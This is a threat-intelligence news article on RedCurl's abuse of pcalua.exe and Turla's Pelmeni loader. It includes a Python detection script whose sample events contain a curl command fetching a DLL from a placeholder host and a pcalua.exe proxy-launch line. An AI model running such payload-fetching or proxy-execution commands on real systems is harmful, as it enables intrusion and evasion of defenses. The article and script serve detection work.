The Russian-speaking cybercrime group known as RedCurl is leveraging a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands.
"The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs," Trend Micro said in an analysis published this month.
"Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities."
RedCurl, which is also known as Earth Kapre and Red Wolf, has been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company had been targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information.
The attack chain examined by Trend Micro involves phishing emails carrying malicious attachments (.ISO and .IMG files) that trigger a multi-stage process: cmd.exe first downloads a legitimate utility called curl from a remote server, and curl then acts as the channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that establishes a connection to the same domain used by curl to fetch the loader.
The attack also makes use of the Impacket open-source software for unauthorized command execution.
The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," Trend Micro said.
"The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its commitment to evading detection within targeted networks."
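The chain described above (a shell invoking curl to fetch a payload, then pcalua.exe used as a proxy to launch the downloaded stage) leaves distinctive parent/child and command-line patterns in process-creation telemetry. The following detection logic is an added example written for this page, not code from Trend Micro or the original article; the events are constructed Sysmon-style process-creation records with a placeholder domain (`placeholder.invalid`), since the page does not publish the C2 infrastructure, and the `-a` switch is the documented way pcalua.exe is handed an executable to run.

```python
import re

# Constructed Sysmon-style process-creation events (Image, ParentImage, CommandLine).
# Paths and the URL are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c curl.exe -s http://placeholder.invalid/ms.dll -o C:\Users\Public\ms.dll"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -s http://placeholder.invalid/ms.dll -o C:\Users\Public\ms.dll"},
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"pcalua.exe -a C:\Users\Public\downloader.exe"},
    {"Image": r"C:\Users\Public\downloader.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"C:\Users\Public\downloader.exe"},
    {"Image": r"C:\Program Files\Git\bin\git.exe",          # benign control case
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "git pull"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
OUTPUT_FLAG_RE = re.compile(r"(^|\s)(-o|--output)\s")
PCALUA_TARGET_RE = re.compile(r"(^|\s)-a\s")  # pcalua.exe -a <program to launch>


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the names of every rule a single process-creation event matches."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    hits = []

    # Stage 1: a command shell whose command line hands curl a URL and an output file.
    if image in SHELLS and "curl" in cmdline.lower() and URL_RE.search(cmdline):
        hits.append("shell_cmdline_invokes_curl_download")

    # Stage 1, seen from the curl process itself: spawned by a shell, writing a remote file to disk.
    if image == "curl.exe" and parent in SHELLS and URL_RE.search(cmdline) and OUTPUT_FLAG_RE.search(cmdline):
        hits.append("curl_download_from_shell")

    # Stage 2: pcalua.exe used as a proxy launcher (-a <target>) rather than by the compatibility UI.
    if image == "pcalua.exe" and PCALUA_TARGET_RE.search(cmdline):
        hits.append("pcalua_proxy_execution")

    # Stage 2, seen from the child: anything whose parent is pcalua.exe deserves review.
    if parent == "pcalua.exe":
        hits.append("child_of_pcalua")

    return hits


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over a list of events and return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The two pcalua rules are deliberately redundant: the `-a` rule fires on the proxy process itself, while the parent check catches the launched child even when the pcalua command line is truncated or missing from the log source. In a production ruleset, the parent check would be the one to tune with an allowlist, since legitimate compatibility-assistant launches also produce pcalua.exe children.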
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun using a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.
Pelmeni – which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS – is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.